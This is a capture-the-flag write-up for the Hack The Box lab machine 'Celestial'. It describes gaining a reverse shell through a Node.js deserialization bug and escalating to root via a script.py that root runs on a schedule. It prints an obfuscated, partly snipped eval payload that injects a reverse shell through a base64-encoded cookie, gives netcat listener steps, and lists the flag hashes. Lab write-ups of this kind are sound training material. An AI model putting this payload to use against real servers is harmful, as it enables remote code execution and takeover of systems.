Celestial

Celestial - 10.10.10.85

Target Enumeration:

OS: Linux

IP: 10.10.10.85

User: 9a093cd22ce86b7f41db4116e80d0b0f

Root: ba1d0019200a54e370ca151007a8095a

Ports / Services / Software Versions Running

3000/tcp open http Node.js Express framework

Vulnerability Exploited:

Nodejs Deserialization bug

https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/

Privilege Escalation:

Python script running as root in the users documents folder

Exploiting the host:

Nmap

Visiting in browser:

Decoding the cookie gives you:

Checking for vulnerabilities in node.js we found

https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/

Download nodejsshell.py and run

Copy this to a file and modify to replicate this whole string as per the guide on the link:

{"rce":"_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,--SNIP-6,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"}

Encode this in base64 and replace the cookie.

Set up a nc listener on 443 and send the request

Your listener will now spawn a shell.

Located in the documents folder is script.py

This appears to run every 5 mins and overwrites itself so you are unable to inject a reverse python shell without it breaking. Also found is output.txt.

This holds the output from the script.py and while we have not found a crontab for root we can assume that it will execute every 5 minutes what ever is in the script.py file as the root user as it overwrites output.txt.

So append to the end of the file:

And set up a listener on 444 and wait around 5 minutes to get the root shell.

Checking roots crontab shows that they are overwriting the file every 5 minutes

PreviousPoison NextWaldo

Last updated 6 years ago